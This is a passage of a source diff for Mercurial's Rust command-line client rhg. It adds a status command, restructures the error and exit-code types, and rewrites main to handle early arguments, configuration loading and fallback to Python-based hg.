+ .long("--removed"),
+ )
+ .arg(
+ Arg::with_name("clean")
+ .help("show only clean files")
+ .short("-c")
+ .long("--clean"),
+ )
+ .arg(
+ Arg::with_name("deleted")
+ .help("show only deleted files")
+ .short("-d")
+ .long("--deleted"),
+ )
+ .arg(
+ Arg::with_name("unknown")
+ .help("show only unknown (not tracked) files")
+ .short("-u")
+ .long("--unknown"),
+ )
+ .arg(
+ Arg::with_name("ignored")
+ .help("show only ignored files")
+ .short("-i")
+ .long("--ignored"),
+ )
+}
+
+/// Pure data type allowing the caller to specify file states to display
+#[derive(Copy, Clone, Debug)]
+pub struct DisplayStates {
+ pub modified: bool,
+ pub added: bool,
+ pub removed: bool,
+ pub clean: bool,
+ pub deleted: bool,
+ pub unknown: bool,
+ pub ignored: bool,
+}
+
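+// These defaults match `hg status` with no flags: everything except
+// clean and ignored files.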
+pub const DEFAULT_DISPLAY_STATES: DisplayStates = DisplayStates {
+ modified: true,
+ added: true,
+ removed: true,
+ clean: false,
+ deleted: true,
+ unknown: true,
+ ignored: false,
+};
+
+pub const ALL_DISPLAY_STATES: DisplayStates = DisplayStates {
+ modified: true,
+ added: true,
+ removed: true,
+ clean: true,
+ deleted: true,
+ unknown: true,
+ ignored: true,
+};
+
+impl DisplayStates {
+ pub fn is_empty(&self) -> bool {
+ !(self.modified
+ || self.added
+ || self.removed
+ || self.clean
+ || self.deleted
+ || self.unknown
+ || self.ignored)
+ }
+}
+
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let status_enabled_default = false;
+ let status_enabled = invocation.config.get_option(b"rhg", b"status")?;
+ if !status_enabled.unwrap_or(status_enabled_default) {
+ return Err(CommandError::unsupported(
+ "status is experimental in rhg (enable it with 'rhg.status = true' \
+ or enable fallback with 'rhg.on-unsupported = fallback')"
+ ));
+ }
+
+ let ui = invocation.ui;
+ let args = invocation.subcommand_args;
+ let display_states = if args.is_present("all") {
+ // TODO when implementing `--quiet`: it excludes clean files
+ // from `--all`
+ ALL_DISPLAY_STATES
+ } else {
+ let requested = DisplayStates {
+ modified: args.is_present("modified"),
+ added: args.is_present("added"),
+ removed: args.is_present("removed"),
+ clean: args.is_present("clean"),
+ deleted: args.is_present("deleted"),
+ unknown: args.is_present("unknown"),
+ ignored: args.is_present("ignored"),
+ };
+ if requested.is_empty() {
+ DEFAULT_DISPLAY_STATES
+ } else {
+ requested
+ }
+ };
+
+ let repo = invocation.repo?;
+ let mut dmap = DirstateMap::new();
+ let dirstate_data = repo.hg_vfs().mmap_open("dirstate")?;
+ let parents = dmap.read(&dirstate_data)?;
+ let options = StatusOptions {
+        // TODO: should be provided by the dirstate parsing and hence be
+        // stored on dmap. Using 0 assumes we aren't below the time
+        // resolution granularity of the FS and the dirstate.
+ last_normal_time: 0,
+ // we're currently supporting file systems with exec flags only
+ // anyway
+ check_exec: true,
+ list_clean: display_states.clean,
+ list_unknown: display_states.unknown,
+ list_ignored: display_states.ignored,
+ collect_traversed_dirs: false,
+ };
+ let ignore_file = repo.working_directory_vfs().join(".hgignore"); // TODO hardcoded
+ let ((lookup, ds_status), pattern_warnings) = hg::status(
+ &dmap,
+ &AlwaysMatcher,
+ repo.working_directory_path().to_owned(),
+ vec![ignore_file],
+ options,
+ )?;
+ if !pattern_warnings.is_empty() {
+ warn!("Pattern warnings: {:?}", &pattern_warnings);
+ }
+
+ if !ds_status.bad.is_empty() {
+ warn!("Bad matches {:?}", &(ds_status.bad))
+ }
+ if !lookup.is_empty() {
+ info!(
+ "Files to be rechecked by retrieval from filelog: {:?}",
+ &lookup
+ );
+ }
+ // TODO check ordering to match `hg status` output.
+ // (this is as in `hg help status`)
+ if display_states.modified {
+ display_status_paths(ui, &(ds_status.modified), b"M")?;
+ }
+ if !lookup.is_empty() {
+ let p1: Node = parents
+ .expect(
+ "Dirstate with no parents should not list any file to
+ be rechecked for modifications",
+ )
+ .p1
+ .into();
+ let p1_hex = format!("{:x}", p1);
+ let mut rechecked_modified: Vec<HgPathCow> = Vec::new();
+ let mut rechecked_clean: Vec<HgPathCow> = Vec::new();
+ for to_check in lookup {
+ if cat_file_is_modified(repo, &to_check, &p1_hex)? {
+ rechecked_modified.push(to_check);
+ } else {
+ rechecked_clean.push(to_check);
+ }
+ }
+ if display_states.modified {
+ display_status_paths(ui, &rechecked_modified, b"M")?;
+ }
+ if display_states.clean {
+ display_status_paths(ui, &rechecked_clean, b"C")?;
+ }
+ }
+ if display_states.added {
+ display_status_paths(ui, &(ds_status.added), b"A")?;
+ }
+ if display_states.clean {
+ display_status_paths(ui, &(ds_status.clean), b"C")?;
+ }
+ if display_states.removed {
+ display_status_paths(ui, &(ds_status.removed), b"R")?;
+ }
+ if display_states.deleted {
+ display_status_paths(ui, &(ds_status.deleted), b"!")?;
+ }
+ if display_states.unknown {
+ display_status_paths(ui, &(ds_status.unknown), b"?")?;
+ }
+ if display_states.ignored {
+ display_status_paths(ui, &(ds_status.ignored), b"I")?;
+ }
+ Ok(())
+}
+
+// Probably more elegant to use a Deref or Borrow trait rather than
+// hardcode HgPathBuf, but not really useful at this point
+fn display_status_paths(
+ ui: &Ui,
+ paths: &[HgPathCow],
+ status_prefix: &[u8],
+) -> Result<(), CommandError> {
+ for path in paths {
+ // Same TODO as in commands::root
+ let bytes: &[u8] = path.as_bytes();
+        // TODO: optimize; probably lots of unneeded copies here,
+        // especially if the output stream is buffered
+ ui.write_stdout(&[status_prefix, b" ", bytes, b"\n"].concat())?;
+ }
+ Ok(())
+}
+
+/// Check if a file is modified by comparing actual repo store and file system.
+///
+/// This is meant for files that the dirstate cannot resolve on its own,
+/// due to time resolution limits.
+///
+/// TODO: detect permission bits and similar metadata modifications
+fn cat_file_is_modified(
+ repo: &Repo,
+ hg_path: &HgPath,
+ rev: &str,
+) -> Result<bool, CommandError> {
+ // TODO CatRev expects &[HgPathBuf], something like
+ // &[impl Deref<HgPath>] would be nicer and should avoid the copy
+ let path_bufs = [hg_path.into()];
+    // TODO: IIUC `cat` returns a single Vec<u8> for all files; being able
+    // to tell them apart as (path, bytes) pairs would be nicer, and as an
+    // optimization would allow resolving the manifest just once.
+ let output = cat(repo, rev, &path_bufs).map_err(|e| (e, rev))?;
+
+ let fs_path = repo
+ .working_directory_vfs()
+ .join(hg_path_to_os_string(hg_path).expect("HgPath conversion"));
+ let hg_data_len: u64 = match output.concatenated.len().try_into() {
+ Ok(v) => v,
+ Err(_) => {
+            // Conversion of the data length to u64 failed; no file on
+            // disk could plausibly have this much content.
+ return Ok(true);
+ }
+ };
+ let fobj = fs::File::open(&fs_path).when_reading_file(&fs_path)?;
+ if fobj.metadata().map_err(|e| StatusError::from(e))?.len() != hg_data_len
+ {
+ return Ok(true);
+ }
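+    // Lengths match: fall back to a streaming byte-by-byte comparison.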
+ for (fs_byte, hg_byte) in
+ BufReader::new(fobj).bytes().zip(output.concatenated)
+ {
+ if fs_byte.map_err(|e| StatusError::from(e))? != hg_byte {
+ return Ok(true);
+ }
+ }
+ Ok(false)
+}
--- a/rust/rhg/src/error.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/error.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,124 +1,195 @@
use crate::exitcode;
+use crate::ui::utf8_to_local;
use crate::ui::UiError;
+use crate::NoRepoInCwdError;
use format_bytes::format_bytes;
-use hg::operations::{FindRootError, FindRootErrorKind};
-use hg::requirements::RequirementsError;
+use hg::config::{ConfigError, ConfigParseError, ConfigValueParseError};
+use hg::errors::HgError;
+use hg::repo::RepoError;
+use hg::revlog::revlog::RevlogError;
use hg::utils::files::get_bytes_from_path;
+use hg::{DirstateError, DirstateMapError, StatusError};
use std::convert::From;
-use std::path::PathBuf;
/// The kind of command error
#[derive(Debug)]
-pub enum CommandErrorKind {
- /// The root of the repository cannot be found
- RootNotFound(PathBuf),
- /// The current directory cannot be found
- CurrentDirNotFound(std::io::Error),
- /// `.hg/requires`
- RequirementsError(RequirementsError),
- /// The standard output stream cannot be written to
- StdoutError,
- /// The standard error stream cannot be written to
- StderrError,
- /// The command aborted
- Abort(Option<Vec<u8>>),
- /// A mercurial capability as not been implemented.
- Unimplemented,
+pub enum CommandError {
+ /// Exit with an error message and "standard" failure exit code.
+ Abort {
+ message: Vec<u8>,
+ detailed_exit_code: exitcode::ExitCode,
+ },
+
+ /// Exit with a failure exit code but no message.
+ Unsuccessful,
+
+ /// Encountered something (such as a CLI argument, repository layout, …)
+ /// not supported by this version of `rhg`. Depending on configuration
+ /// `rhg` may attempt to silently fall back to Python-based `hg`, which
+ /// may or may not support this feature.
+ UnsupportedFeature { message: Vec<u8> },
}
-impl CommandErrorKind {
- pub fn get_exit_code(&self) -> exitcode::ExitCode {
- match self {
- CommandErrorKind::RootNotFound(_) => exitcode::ABORT,
- CommandErrorKind::CurrentDirNotFound(_) => exitcode::ABORT,
- CommandErrorKind::RequirementsError(
- RequirementsError::Unsupported { .. },
- ) => exitcode::UNIMPLEMENTED_COMMAND,
- CommandErrorKind::RequirementsError(_) => exitcode::ABORT,
- CommandErrorKind::StdoutError => exitcode::ABORT,
- CommandErrorKind::StderrError => exitcode::ABORT,
- CommandErrorKind::Abort(_) => exitcode::ABORT,
- CommandErrorKind::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND,
+impl CommandError {
+ pub fn abort(message: impl AsRef<str>) -> Self {
+ CommandError::abort_with_exit_code(message, exitcode::ABORT)
+ }
+
+ pub fn abort_with_exit_code(
+ message: impl AsRef<str>,
+ detailed_exit_code: exitcode::ExitCode,
+ ) -> Self {
+ CommandError::Abort {
+ // TODO: bytes-based (instead of Unicode-based) formatting
+ // of error messages to handle non-UTF-8 filenames etc:
+ // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output
+ message: utf8_to_local(message.as_ref()).into(),
+            detailed_exit_code,
}
}
- /// Return the message corresponding to the error kind if any
- pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> {
- match self {
- CommandErrorKind::RootNotFound(path) => {
- let bytes = get_bytes_from_path(path);
- Some(format_bytes!(
- b"abort: no repository found in '{}' (.hg not found)!\n",
- bytes.as_slice()
- ))
+ pub fn unsupported(message: impl AsRef<str>) -> Self {
+ CommandError::UnsupportedFeature {
+ message: utf8_to_local(message.as_ref()).into(),
+ }
+ }
+}
+
+/// For now we don’t differentiate between CLI args that are invalid and
+/// ones that are valid for `hg` but not yet supported by `rhg`.
+impl From<clap::Error> for CommandError {
+ fn from(error: clap::Error) -> Self {
+ CommandError::unsupported(error.to_string())
+ }
+}
+
+impl From<HgError> for CommandError {
+ fn from(error: HgError) -> Self {
+ match error {
+ HgError::UnsupportedFeature(message) => {
+ CommandError::unsupported(message)
}
- CommandErrorKind::CurrentDirNotFound(e) => Some(format_bytes!(
- b"abort: error getting current working directory: {}\n",
- e.to_string().as_bytes(),
- )),
- CommandErrorKind::RequirementsError(
- RequirementsError::Corrupted,
- ) => Some(
- "abort: .hg/requires is corrupted\n".as_bytes().to_owned(),
- ),
- CommandErrorKind::Abort(message) => message.to_owned(),
- _ => None,
+ _ => CommandError::abort(error.to_string()),
}
}
}
-/// The error type for the Command trait
-#[derive(Debug)]
-pub struct CommandError {
- pub kind: CommandErrorKind,
-}
-
-impl CommandError {
- /// Exist the process with the corresponding exit code.
- pub fn exit(&self) {
- std::process::exit(self.kind.get_exit_code())
- }
-
- /// Return the message corresponding to the command error if any
- pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> {
- self.kind.get_error_message_bytes()
- }
-}
-
-impl From<CommandErrorKind> for CommandError {
- fn from(kind: CommandErrorKind) -> Self {
- CommandError { kind }
+impl From<ConfigValueParseError> for CommandError {
+ fn from(error: ConfigValueParseError) -> Self {
+ CommandError::abort_with_exit_code(
+ error.to_string(),
+ exitcode::CONFIG_ERROR_ABORT,
+ )
}
}
impl From<UiError> for CommandError {
- fn from(error: UiError) -> Self {
- CommandError {
- kind: match error {
- UiError::StdoutError(_) => CommandErrorKind::StdoutError,
- UiError::StderrError(_) => CommandErrorKind::StderrError,
+ fn from(_error: UiError) -> Self {
+ // If we already failed writing to stdout or stderr,
+ // writing an error message to stderr about it would be likely to fail
+ // too.
+ CommandError::abort("")
+ }
+}
+
+impl From<RepoError> for CommandError {
+ fn from(error: RepoError) -> Self {
+ match error {
+ RepoError::NotFound { at } => CommandError::Abort {
+ message: format_bytes!(
+ b"abort: repository {} not found",
+ get_bytes_from_path(at)
+ ),
+ detailed_exit_code: exitcode::ABORT,
},
+ RepoError::ConfigParseError(error) => error.into(),
+ RepoError::Other(error) => error.into(),
+ }
+ }
+}
+
+impl<'a> From<&'a NoRepoInCwdError> for CommandError {
+ fn from(error: &'a NoRepoInCwdError) -> Self {
+ let NoRepoInCwdError { cwd } = error;
+ CommandError::Abort {
+ message: format_bytes!(
+ b"abort: no repository found in '{}' (.hg not found)!",
+ get_bytes_from_path(cwd)
+ ),
+ detailed_exit_code: exitcode::ABORT,
+ }
+ }
+}
+
+impl From<ConfigError> for CommandError {
+ fn from(error: ConfigError) -> Self {
+ match error {
+ ConfigError::Parse(error) => error.into(),
+ ConfigError::Other(error) => error.into(),
}
}
}
-impl From<FindRootError> for CommandError {
- fn from(err: FindRootError) -> Self {
- match err.kind {
- FindRootErrorKind::RootNotFound(path) => CommandError {
- kind: CommandErrorKind::RootNotFound(path),
- },
- FindRootErrorKind::GetCurrentDirError(e) => CommandError {
- kind: CommandErrorKind::CurrentDirNotFound(e),
- },
+impl From<ConfigParseError> for CommandError {
+ fn from(error: ConfigParseError) -> Self {
+ let ConfigParseError {
+ origin,
+ line,
+ message,
+ } = error;
+ let line_message = if let Some(line_number) = line {
+ format_bytes!(b":{}", line_number.to_string().into_bytes())
+ } else {
+ Vec::new()
+ };
+ CommandError::Abort {
+ message: format_bytes!(
+ b"config error at {}{}: {}",
+ origin,
+ line_message,
+ message
+ ),
+ detailed_exit_code: exitcode::CONFIG_ERROR_ABORT,
}
}
}
-impl From<RequirementsError> for CommandError {
- fn from(err: RequirementsError) -> Self {
- CommandError {
- kind: CommandErrorKind::RequirementsError(err),
+impl From<(RevlogError, &str)> for CommandError {
+ fn from((err, rev): (RevlogError, &str)) -> CommandError {
+ match err {
+ RevlogError::WDirUnsupported => CommandError::abort(
+ "abort: working directory revision cannot be specified",
+ ),
+ RevlogError::InvalidRevision => CommandError::abort(format!(
+ "abort: invalid revision identifier: {}",
+ rev
+ )),
+ RevlogError::AmbiguousPrefix => CommandError::abort(format!(
+ "abort: ambiguous revision identifier: {}",
+ rev
+ )),
+ RevlogError::Other(error) => error.into(),
}
}
}
+
+impl From<StatusError> for CommandError {
+ fn from(error: StatusError) -> Self {
+ CommandError::abort(format!("{}", error))
+ }
+}
+
+impl From<DirstateMapError> for CommandError {
+ fn from(error: DirstateMapError) -> Self {
+ CommandError::abort(format!("{}", error))
+ }
+}
+
+impl From<DirstateError> for CommandError {
+ fn from(error: DirstateError) -> Self {
+ match error {
+ DirstateError::Common(error) => error.into(),
+ DirstateError::Map(error) => error.into(),
+ }
+ }
+}
--- a/rust/rhg/src/exitcode.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/exitcode.rs Tue Apr 20 11:01:06 2021 -0400
@@ -6,5 +6,11 @@
/// Generic abort
pub const ABORT: ExitCode = 255;
-/// Command not implemented by rhg
-pub const UNIMPLEMENTED_COMMAND: ExitCode = 252;
+/// Abort when there is a config-related error
+pub const CONFIG_ERROR_ABORT: ExitCode = 30;
+
+/// Generic: something completed but did not succeed
+pub const UNSUCCESSFUL: ExitCode = 1;
+
+/// Command or feature not implemented by rhg
+pub const UNIMPLEMENTED: ExitCode = 252;
--- a/rust/rhg/src/main.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/main.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,185 +1,509 @@
extern crate log;
+use crate::ui::Ui;
use clap::App;
use clap::AppSettings;
use clap::Arg;
-use clap::ArgGroup;
use clap::ArgMatches;
-use clap::SubCommand;
-use hg::operations::DebugDataKind;
-use std::convert::TryFrom;
+use format_bytes::{format_bytes, join};
+use hg::config::Config;
+use hg::repo::{Repo, RepoError};
+use hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes};
+use hg::utils::SliceExt;
+use std::ffi::OsString;
+use std::path::PathBuf;
+use std::process::Command;
-mod commands;
+mod blackbox;
mod error;
mod exitcode;
mod ui;
-use commands::Command;
use error::CommandError;
-fn main() {
- env_logger::init();
+fn main_with_result(
+ process_start_time: &blackbox::ProcessStartTime,
+ ui: &ui::Ui,
+ repo: Result<&Repo, &NoRepoInCwdError>,
+ config: &Config,
+) -> Result<(), CommandError> {
+ check_extensions(config)?;
+
let app = App::new("rhg")
- .setting(AppSettings::AllowInvalidUtf8)
+ .global_setting(AppSettings::AllowInvalidUtf8)
+ .global_setting(AppSettings::DisableVersion)
.setting(AppSettings::SubcommandRequired)
.setting(AppSettings::VersionlessSubcommands)
- .version("0.0.1")
- .subcommand(
- SubCommand::with_name("root").about(commands::root::HELP_TEXT),
- )
- .subcommand(
- SubCommand::with_name("files")
- .arg(
- Arg::with_name("rev")
- .help("search the repository as it is in REV")
- .short("-r")
- .long("--revision")
- .value_name("REV")
- .takes_value(true),
- )
- .about(commands::files::HELP_TEXT),
+ .arg(
+ Arg::with_name("repository")
+ .help("repository root directory")
+ .short("-R")
+ .long("--repository")
+ .value_name("REPO")
+ .takes_value(true)
+ // Both ok: `hg -R ./foo log` or `hg log -R ./foo`
+ .global(true),
)
- .subcommand(
- SubCommand::with_name("cat")
- .arg(
- Arg::with_name("rev")
- .help("search the repository as it is in REV")
- .short("-r")
- .long("--revision")
- .value_name("REV")
- .takes_value(true),
- )
- .arg(
- clap::Arg::with_name("files")
- .required(true)
- .multiple(true)
- .empty_values(false)
- .value_name("FILE")
- .help("Activity to start: activity@category"),
- )
- .about(commands::cat::HELP_TEXT),
+ .arg(
+ Arg::with_name("config")
+ .help("set/override config option (use 'section.name=value')")
+ .long("--config")
+ .value_name("CONFIG")
+ .takes_value(true)
+ .global(true)
+ // Ok: `--config section.key1=val --config section.key2=val2`
+ .multiple(true)
+ // Not ok: `--config section.key1=val section.key2=val2`
+ .number_of_values(1),
+ )
+ .arg(
+ Arg::with_name("cwd")
+ .help("change working directory")
+ .long("--cwd")
+ .value_name("DIR")
+ .takes_value(true)
+ .global(true),
)
- .subcommand(
- SubCommand::with_name("debugdata")
- .about(commands::debugdata::HELP_TEXT)
- .arg(
- Arg::with_name("changelog")
- .help("open changelog")
- .short("-c")
- .long("--changelog"),
- )
- .arg(
- Arg::with_name("manifest")
- .help("open manifest")
- .short("-m")
- .long("--manifest"),
+ .version("0.0.1");
+ let app = add_subcommand_args(app);
+
+ let matches = app.clone().get_matches_safe()?;
+
+ let (subcommand_name, subcommand_matches) = matches.subcommand();
+ let run = subcommand_run_fn(subcommand_name)
+ .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired");
+ let subcommand_args = subcommand_matches
+ .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired");
+
+ let invocation = CliInvocation {
+ ui,
+ subcommand_args,
+ config,
+ repo,
+ };
+ let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?;
+ blackbox.log_command_start();
+ let result = run(&invocation);
+ blackbox.log_command_end(exit_code(
+ &result,
+ // TODO: show a warning or combine with original error if `get_bool`
+ // returns an error
+ config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ ));
+ result
+}
+
+fn main() {
+ // Run this first, before we find out if the blackbox extension is even
+ // enabled, in order to include everything in-between in the duration
+ // measurements. Reading config files can be slow if they’re on NFS.
+ let process_start_time = blackbox::ProcessStartTime::now();
+
+ env_logger::init();
+ let ui = ui::Ui::new();
+
+ let early_args = EarlyArgs::parse(std::env::args_os());
+
+ let initial_current_dir = early_args.cwd.map(|cwd| {
+ let cwd = get_path_from_bytes(&cwd);
+ std::env::current_dir()
+ .and_then(|initial| {
+ std::env::set_current_dir(cwd)?;
+ Ok(initial)
+ })
+ .unwrap_or_else(|error| {
+ exit(
+ &None,
+ &ui,
+ OnUnsupported::Abort,
+ Err(CommandError::abort(format!(
+ "abort: {}: '{}'",
+ error,
+ cwd.display()
+ ))),
+ false,
)
- .group(
- ArgGroup::with_name("")
- .args(&["changelog", "manifest"])
- .required(true),
- )
- .arg(
- Arg::with_name("rev")
- .help("revision")
- .required(true)
- .value_name("REV"),
- ),
- )
- .subcommand(
- SubCommand::with_name("debugrequirements")
- .about(commands::debugrequirements::HELP_TEXT),
- );
-
- let matches = app.clone().get_matches_safe().unwrap_or_else(|err| {
- let _ = ui::Ui::new().writeln_stderr_str(&err.message);
- std::process::exit(exitcode::UNIMPLEMENTED_COMMAND)
+ })
});
- let ui = ui::Ui::new();
+ let non_repo_config =
+ Config::load(early_args.config).unwrap_or_else(|error| {
+ // Normally this is decided based on config, but we don’t have that
+ // available. As of this writing config loading never returns an
+ // "unsupported" error but that is not enforced by the type system.
+ let on_unsupported = OnUnsupported::Abort;
- let command_result = match_subcommand(matches, &ui);
+ exit(
+ &initial_current_dir,
+ &ui,
+ on_unsupported,
+ Err(error.into()),
+ false,
+ )
+ });
- match command_result {
- Ok(_) => std::process::exit(exitcode::OK),
- Err(e) => {
- let message = e.get_error_message_bytes();
- if let Some(msg) = message {
- match ui.write_stderr(&msg) {
- Ok(_) => (),
- Err(_) => std::process::exit(exitcode::ABORT),
- };
- };
- e.exit()
+ if let Some(repo_path_bytes) = &early_args.repo {
+ lazy_static::lazy_static! {
+ static ref SCHEME_RE: regex::bytes::Regex =
+ // Same as `_matchscheme` in `mercurial/util.py`
+ regex::bytes::Regex::new("^[a-zA-Z0-9+.\\-]+:").unwrap();
+ }
+ if SCHEME_RE.is_match(&repo_path_bytes) {
+ exit(
+ &initial_current_dir,
+ &ui,
+ OnUnsupported::from_config(&ui, &non_repo_config),
+ Err(CommandError::UnsupportedFeature {
+ message: format_bytes!(
+ b"URL-like --repository {}",
+ repo_path_bytes
+ ),
+ }),
+ // TODO: show a warning or combine with original error if
+ // `get_bool` returns an error
+ non_repo_config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ )
+ }
+ }
+ let repo_path = early_args.repo.as_deref().map(get_path_from_bytes);
+ let repo_result = match Repo::find(&non_repo_config, repo_path) {
+ Ok(repo) => Ok(repo),
+ Err(RepoError::NotFound { at }) if repo_path.is_none() => {
+ // Not finding a repo is not fatal yet, if `-R` was not given
+ Err(NoRepoInCwdError { cwd: at })
+ }
+ Err(error) => exit(
+ &initial_current_dir,
+ &ui,
+ OnUnsupported::from_config(&ui, &non_repo_config),
+ Err(error.into()),
+ // TODO: show a warning or combine with original error if
+ // `get_bool` returns an error
+ non_repo_config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ ),
+ };
+
+ let config = if let Ok(repo) = &repo_result {
+ repo.config()
+ } else {
+ &non_repo_config
+ };
+ let on_unsupported = OnUnsupported::from_config(&ui, config);
+
+ let result = main_with_result(
+ &process_start_time,
+ &ui,
+ repo_result.as_ref(),
+ config,
+ );
+ exit(
+ &initial_current_dir,
+ &ui,
+ on_unsupported,
+ result,
+ // TODO: show a warning or combine with original error if `get_bool`
+ // returns an error
+ config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ )
+}
+
+fn exit_code(
+ result: &Result<(), CommandError>,
+ use_detailed_exit_code: bool,
+) -> i32 {
+ match result {
+ Ok(()) => exitcode::OK,
+ Err(CommandError::Abort {
+ message: _,
+ detailed_exit_code,
+ }) => {
+ if use_detailed_exit_code {
+ *detailed_exit_code
+ } else {
+ exitcode::ABORT
+ }
+ }
+ Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL,
+
+ // Exit with a specific code and no error message to let a potential
+ // wrapper script fallback to Python-based Mercurial.
+ Err(CommandError::UnsupportedFeature { .. }) => {
+ exitcode::UNIMPLEMENTED
}
}
}
-fn match_subcommand(
- matches: ArgMatches,
- ui: &ui::Ui,
-) -> Result<(), CommandError> {
- match matches.subcommand() {
- ("root", _) => commands::root::RootCommand::new().run(&ui),
- ("files", Some(matches)) => {
- commands::files::FilesCommand::try_from(matches)?.run(&ui)
+fn exit(
+ initial_current_dir: &Option<PathBuf>,
+ ui: &Ui,
+ mut on_unsupported: OnUnsupported,
+ result: Result<(), CommandError>,
+ use_detailed_exit_code: bool,
+) -> ! {
+ if let (
+ OnUnsupported::Fallback { executable },
+ Err(CommandError::UnsupportedFeature { .. }),
+ ) = (&on_unsupported, &result)
+ {
+ let mut args = std::env::args_os();
+ let executable_path = get_path_from_bytes(&executable);
+ let this_executable = args.next().expect("expected argv[0] to exist");
+ if executable_path == &PathBuf::from(this_executable) {
+ // Avoid spawning infinitely many processes until resource
+ // exhaustion.
+ let _ = ui.write_stderr(&format_bytes!(
+ b"Blocking recursive fallback. The 'rhg.fallback-executable = {}' config \
+ points to `rhg` itself.\n",
+ executable
+ ));
+ on_unsupported = OnUnsupported::Abort
+ } else {
+ // `args` is now `argv[1..]` since we’ve already consumed `argv[0]`
+ let mut command = Command::new(executable_path);
+ command.args(args);
+ if let Some(initial) = initial_current_dir {
+ command.current_dir(initial);
+ }
+ let result = command.status();
+ match result {
+ Ok(status) => std::process::exit(
+ status.code().unwrap_or(exitcode::ABORT),
+ ),
+ Err(error) => {
+ let _ = ui.write_stderr(&format_bytes!(
+ b"tried to fall back to a '{}' sub-process but got error {}\n",
+ executable, format_bytes::Utf8(error)
+ ));
+ on_unsupported = OnUnsupported::Abort
+ }
+ }
}
- ("cat", Some(matches)) => {
- commands::cat::CatCommand::try_from(matches)?.run(&ui)
- }
- ("debugdata", Some(matches)) => {
- commands::debugdata::DebugDataCommand::try_from(matches)?.run(&ui)
+ }
+ exit_no_fallback(ui, on_unsupported, result, use_detailed_exit_code)
+}
+
+fn exit_no_fallback(
+ ui: &Ui,
+ on_unsupported: OnUnsupported,
+ result: Result<(), CommandError>,
+ use_detailed_exit_code: bool,
+) -> ! {
+ match &result {
+ Ok(_) => {}
+ Err(CommandError::Unsuccessful) => {}
+ Err(CommandError::Abort {
+ message,
+ detailed_exit_code: _,
+ }) => {
+ if !message.is_empty() {
+ // Ignore errors when writing to stderr, we’re already exiting
+ // with failure code so there’s not much more we can do.
+ let _ = ui.write_stderr(&format_bytes!(b"{}\n", message));
+ }
}
- ("debugrequirements", _) => {
- commands::debugrequirements::DebugRequirementsCommand::new()
- .run(&ui)
+ Err(CommandError::UnsupportedFeature { message }) => {
+ match on_unsupported {
+ OnUnsupported::Abort => {
+ let _ = ui.write_stderr(&format_bytes!(
+ b"unsupported feature: {}\n",
+ message
+ ));
+ }
+ OnUnsupported::AbortSilent => {}
+ OnUnsupported::Fallback { .. } => unreachable!(),
+ }
}
- _ => unreachable!(), // Because of AppSettings::SubcommandRequired,
}
+ std::process::exit(exit_code(&result, use_detailed_exit_code))
}
-impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::files::FilesCommand<'a> {
- type Error = CommandError;
+macro_rules! subcommands {
+ ($( $command: ident )+) => {
+ mod commands {
+ $(
+ pub mod $command;
+ )+
+ }
+
+ fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> {
+ app
+ $(
+ .subcommand(commands::$command::args())
+ )+
+ }
+
+ pub type RunFn = fn(&CliInvocation) -> Result<(), CommandError>;
+
+ fn subcommand_run_fn(name: &str) -> Option<RunFn> {
+ match name {
+ $(
+ stringify!($command) => Some(commands::$command::run),
+ )+
+ _ => None,
+ }
+ }
+ };
+}
+
+subcommands! {
+ cat
+ debugdata
+ debugrequirements
+ files
+ root
+ config
+ status
+}
+
+pub struct CliInvocation<'a> {
+ ui: &'a Ui,
+ subcommand_args: &'a ArgMatches<'a>,
+ config: &'a Config,
+ /// References inside `Result` are a bit peculiar but allow
+ /// `invocation.repo?` to work out with `&CliInvocation` since this
+ /// `Result` type is `Copy`.
+ repo: Result<&'a Repo, &'a NoRepoInCwdError>,
+}
+
+struct NoRepoInCwdError {
+ cwd: PathBuf,
+}
- fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> {
- let rev = args.value_of("rev");
- Ok(commands::files::FilesCommand::new(rev))
+/// CLI arguments to be parsed "early" in order to be able to read
+/// configuration before using Clap. Ideally we would also use Clap for this,
+/// see <https://github.com/clap-rs/clap/discussions/2366>.
+///
+/// These arguments are still declared when we do use Clap later, so that Clap
+/// does not return an error for their presence.
+struct EarlyArgs {
+ /// Values of all `--config` arguments. (Possibly none)
+ config: Vec<Vec<u8>>,
+ /// Value of the `-R` or `--repository` argument, if any.
+ repo: Option<Vec<u8>>,
+ /// Value of the `--cwd` argument, if any.
+ cwd: Option<Vec<u8>>,
+}
+
+impl EarlyArgs {
+ fn parse(args: impl IntoIterator<Item = OsString>) -> Self {
+ let mut args = args.into_iter().map(get_bytes_from_os_str);
+ let mut config = Vec::new();
+ let mut repo = None;
+ let mut cwd = None;
+ // Use `while let` instead of `for` so that we can also call
+ // `args.next()` inside the loop.
+ while let Some(arg) = args.next() {
+ if arg == b"--config" {
+ if let Some(value) = args.next() {
+ config.push(value)
+ }
+ } else if let Some(value) = arg.drop_prefix(b"--config=") {
+ config.push(value.to_owned())
+ }
+
+ if arg == b"--cwd" {
+ if let Some(value) = args.next() {
+ cwd = Some(value)
+ }
+ } else if let Some(value) = arg.drop_prefix(b"--cwd=") {
+ cwd = Some(value.to_owned())
+ }
+
+ if arg == b"--repository" || arg == b"-R" {
+ if let Some(value) = args.next() {
+ repo = Some(value)
+ }
+ } else if let Some(value) = arg.drop_prefix(b"--repository=") {
+ repo = Some(value.to_owned())
